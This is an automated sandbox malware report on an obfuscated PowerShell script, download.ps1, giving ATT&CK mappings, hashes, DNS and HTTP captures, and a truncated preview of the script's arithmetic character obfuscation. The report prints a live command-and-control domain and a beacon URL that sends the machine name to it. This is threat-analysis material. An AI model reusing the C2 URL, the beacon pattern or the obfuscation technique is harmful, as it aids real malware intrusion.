Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
ATT&CK tactics and techniques (one line per tactic column of the report matrix; the numbers shown in the matrix are kept in front of the technique they precede):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 121 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 21 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 11 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
download.ps1 | 3% | ReversingLabs | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527 | 0% | Avira URL Cloud | safe |
http://crl.micro6 | 0% | Avira URL Cloud | safe |
http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 | 100% | Avira URL Cloud | malware |
http://cmacnnkfbhlcncm.top | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.181.132 | true | false | | high
cmacnnkfbhlcncm.top | 45.61.136.138 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 | false | Avira URL Cloud: malware | unknown
http://www.google.com/ | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.61.136.138 | cmacnnkfbhlcncm.top | United States | | 40676 | AS40676US | false
142.250.181.132 | www.google.com | United States | | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578248
Start date and time: 2024-12-19 13:28:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal64.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 15
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4164 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:28:57 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Match: 45.61.136.138
Associated Sample Name / URL | Detection | Threat Name | Context
download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
download.ps1 | malicious | Unknown | cmacnnkfbhlcncm.top/h5raxn90w1htr.php?id=user-PC&key=130484823816&s=527
Match: cmacnnkfbhlcncm.top
Associated Sample Name / URL | Detection | Threat Name | Context
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
Match: AS40676 (US)
Associated Sample Name / URL | Detection | Threat Name | Context
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
loligang.ppc.elf | malicious | Mirai | 23.179.110.68
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
download.ps1 | malicious | Unknown | 45.61.136.138
7hCWDvuinz.js | malicious | Unknown | 45.61.137.71
Fattura72543461.js | malicious | Unknown | 45.61.137.71
Fattura72543461.js | malicious | Unknown | 45.61.137.71
                                                                                                              No context
                                                                                                              No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulNg7/l/lZ:NllUy7/
MD5: C2537D289A7DB67172EF4C08F96CB120
SHA1: 95114E0682CC761B86321F0DCC5CBE9A3E89DB21
SHA-256: 26D1A27AED70765338B4BCFEDC7C23289CFDA9A984B1A55799FB89CFAE10C3C9
SHA-512: B991F49ECB907FA7CFCF6121BA004C1C5156A86F508E22B76FD1E53B21B7D6C4831EFF8EBCFB2CC9CB97E44DD578B276B734CB1D3CE96355E51C4578FB227603
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                              Preview:@...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6222
Entropy (8bit): 3.7090543206160054
Encrypted: false
SSDEEP: 48:tvNWJ+CebU2K+QGzukvhkvklCywan2vYarXbUYialzU7SogZopPYarXbUYialWUt:Bi+Cbo1ykvhkvCCt6YLZ++HxYLZb+HW
MD5: B9143ABF1B66553BCFAF67633029889A
SHA1: D264E7807720E478901E3411BD074B100F51E3A8
SHA-256: B58DE2713959348F14F034EF83F92502BFD19BF119B6493F8F4C6AAA1C87CEC6
SHA-512: CE8A870C74705B7B9CBEA3FD0A2FD4E32DF1C300B499D09E4ED3BA16CE345C52AE30B820E5280D9812F0CF6E3D9B7BBB04756F3EF0F79E840161F7435512EAED
Malicious: false
                                                                                                              Preview:...................................FL..................F.".. ...d......."+..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......d?..R...I2..R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.c....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......DWSl.Y.c....C......................A.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.c....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.c....E.....................@%..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.c....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.c....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.c....q...........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6222
Entropy (8bit): 3.7090543206160054
Encrypted: false
SSDEEP: 48:tvNWJ+CebU2K+QGzukvhkvklCywan2vYarXbUYialzU7SogZopPYarXbUYialWUt:Bi+Cbo1ykvhkvCCt6YLZ++HxYLZb+HW
MD5: B9143ABF1B66553BCFAF67633029889A
SHA1: D264E7807720E478901E3411BD074B100F51E3A8
SHA-256: B58DE2713959348F14F034EF83F92502BFD19BF119B6493F8F4C6AAA1C87CEC6
SHA-512: CE8A870C74705B7B9CBEA3FD0A2FD4E32DF1C300B499D09E4ED3BA16CE345C52AE30B820E5280D9812F0CF6E3D9B7BBB04756F3EF0F79E840161F7435512EAED
Malicious: false
                                                                                                              Preview:...................................FL..................F.".. ...d......."+..R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......d?..R...I2..R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.c....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......DWSl.Y.c....C......................A.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.c....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y.c....E.....................@%..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.c....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.c....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.c....q...........
File type: ASCII text, with very long lines (10876), with CRLF line terminators
Entropy (8bit): 6.0111175419643885
TrID: (no match)
File name: download.ps1
File size: 19'439 bytes
MD5: f91e3c78bfc0cc41330d65764455a851
SHA1: 294c15d09a7df4d91e891d7ca3bc2803c8262ce1
SHA256: 3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
SHA512: 1899a3848c18343b39e0a3cb5887b777e270a032f7447e9554c94a4a757cb05623e3b17c5da1bd3fb43ee2f16a0da64a71e12c99fc81efc86e533c0927b0e700
SSDEEP: 384:fD6lYFayIXH9VxzwZ3XPOsGhJ06ZLpAg1cHsf4ftu1vrNpjuFLP2TdQiGo/N:fOlYUyqps3XWfuIVAru1vrNZuURQiGo1
TLSH: F5927EC837C8E8E1C6CD967ED90A7C087762383AD4D56FC0F398D5C563AA294ABD8C40
                                                                                                                File Content Preview:$cvdkoxwrnfj=$executioncontext;$inenatreerbealentionerinaten = ([ChAR[]]@((640-(5571804/(52357872/(12327-(54379024/7984))))),(-9718+(93713840/(61561456/6418))),(553812/(18051-(55511100/(61505100/(263+(14980-6008)))))),(9327-9277),(9128/(9681-(72079814/(36
                                                                                                                Icon Hash:3270d6baae77db44
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 13:29:00.172491074 CET | 52014 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 13:29:00.589903116 CET | 53 | 52014 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 13:29:01.999372959 CET | 49521 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 13:29:02.137217999 CET | 53 | 49521 | 1.1.1.1 | 192.168.2.5

DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 13:29:00.172491074 CET | 192.168.2.5 | 1.1.1.1 | 0xe735 | Standard query (0) | cmacnnkfbhlcncm.top | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:29:01.999372959 CET | 192.168.2.5 | 1.1.1.1 | 0x9764 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 13:29:00.589903116 CET | 1.1.1.1 | 192.168.2.5 | 0xe735 | No error (0) | cmacnnkfbhlcncm.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 13:29:02.137217999 CET | 1.1.1.1 | 192.168.2.5 | 0x9764 | No error (0) | www.google.com | | 142.250.181.132 | A (IP address) | IN (0x0001) | false

Contacted domains:
• cmacnnkfbhlcncm.top
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 45.61.136.138 | 80 | 4164 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data

Dec 19, 2024 13:29:00.724692106 CET | 216 | OUT
GET /o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: cmacnnkfbhlcncm.top
Connection: Keep-Alive

Dec 19, 2024 13:29:01.997759104 CET | 166 | IN
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Dec 2024 12:29:01 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 142.250.181.132 | 80 | 4164 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data

Dec 19, 2024 13:29:02.285887003 CET | 159 | OUT
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive

Dec 19, 2024 13:29:04.146959066 CET | 1236 | IN
HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 12:29:03 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ZyRLHfeFz8ZbNWiHfvCzJw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-V_t94piQQzx2zhA0GNL4eN6yHV1hGrZHtg1zHvvpw5hYUQ9ls83Q; expires=Tue, 17-Jun-2025 12:29:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=CSH21qqp1Et4ne3rJJqOlWIw1ZF2ftlTK-Gw2Gsgmz2JZ4f_GnVtGynYmcUMz_Ak-i_L4G3Eoypwa2lKdh1jX4Cz3SPW4Iabt9QlvnM56KDzjzyFr0FUOumzhHeMKh2G5lSdmLX6GSSajx5Qsi-pjpNbuHd9JMl66f4lrfdqbp53LmP-TItd0qsxWDkAgrs4t4yqb0okJA; expires=Fri, 20-Jun-2025 12:29:03 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
                                                                                                                Data Ascii: d,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline
                                                                                                                Dec 19, 2024 13:29:04.266819000 CET1236INData Raw: 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65
                                                                                                                Data Ascii: 0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-



Target ID: 0
Start time: 07:28:53
Start date: 19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 07:28:54
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Memory Dump Source
• Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 47731f6546828ef759251406d4f41ebfd598caa1b54bedd768a7c2ebbb6e0044
• Instruction ID: e042d1236bc9d2f1d420ec11b552abd7b0101e4d5bd3c7bbee42e03d2a36b6dc
• Opcode Fuzzy Hash: 47731f6546828ef759251406d4f41ebfd598caa1b54bedd768a7c2ebbb6e0044
• Instruction Fuzzy Hash: 61F1A23091CA8D8FEBA8EF28C8557E937E1FF64750F04426AE84DC7295DF3499458B82
                                                                                                                  • Instruction Fuzzy Hash: 1EF0BE32A0D5898FEB64EF1CE4558A8B7E0FF05360B0504B6E15EC70A7DB2AEC40CB54
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2192353422.00007FF8491F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff8491f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4ad103b0dffd686b9d1eabecc04bb2acb52c70621fb4bc016e488227f9f3224
                                                                                                                  • Instruction ID: 8bf0de622cf344d760f47ae825cfa4ad2491377da8663700c5284db9c4c293f5
                                                                                                                  • Opcode Fuzzy Hash: b4ad103b0dffd686b9d1eabecc04bb2acb52c70621fb4bc016e488227f9f3224
                                                                                                                  • Instruction Fuzzy Hash: 3FF0A03131CF044FE748EE2DE4497A2B3E0FBA8350F14462FE44AC3291DA21E8818782
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04bd7268ad9e626f6a8e437e50892c00baf45aa65c3e2fdd2987d061a620a0b6
                                                                                                                  • Instruction ID: e628f5c3aff580f47e651600a10021a0e61cd3e73442c34ebcf697b8aed6c1e4
                                                                                                                  • Opcode Fuzzy Hash: 04bd7268ad9e626f6a8e437e50892c00baf45aa65c3e2fdd2987d061a620a0b6
                                                                                                                  • Instruction Fuzzy Hash: D8F0963180C6898FDB06EF6488195D5BFA0FF26351F1402EBD458C70A2DB759554CB82
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2188766524.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: -I$0-I$8-I$X-I$aL_I$h-I$x-I$-I
                                                                                                                  • API String ID: 0-472530879
                                                                                                                  • Opcode ID: de752754e509c5f3500f65c3afb421d6a848034b5d42bc230f2d348b4dfdd29d
                                                                                                                  • Instruction ID: 91299e736cbbccfb21bdc44d90803d567f0467117d1e80e7889edf35f8565a8d
                                                                                                                  • Opcode Fuzzy Hash: de752754e509c5f3500f65c3afb421d6a848034b5d42bc230f2d348b4dfdd29d
                                                                                                                  • Instruction Fuzzy Hash: 2D51E573E0E9C24FF2E5A72C38191B57B80FFA2A60B5846FBC048D75DBE9159C064395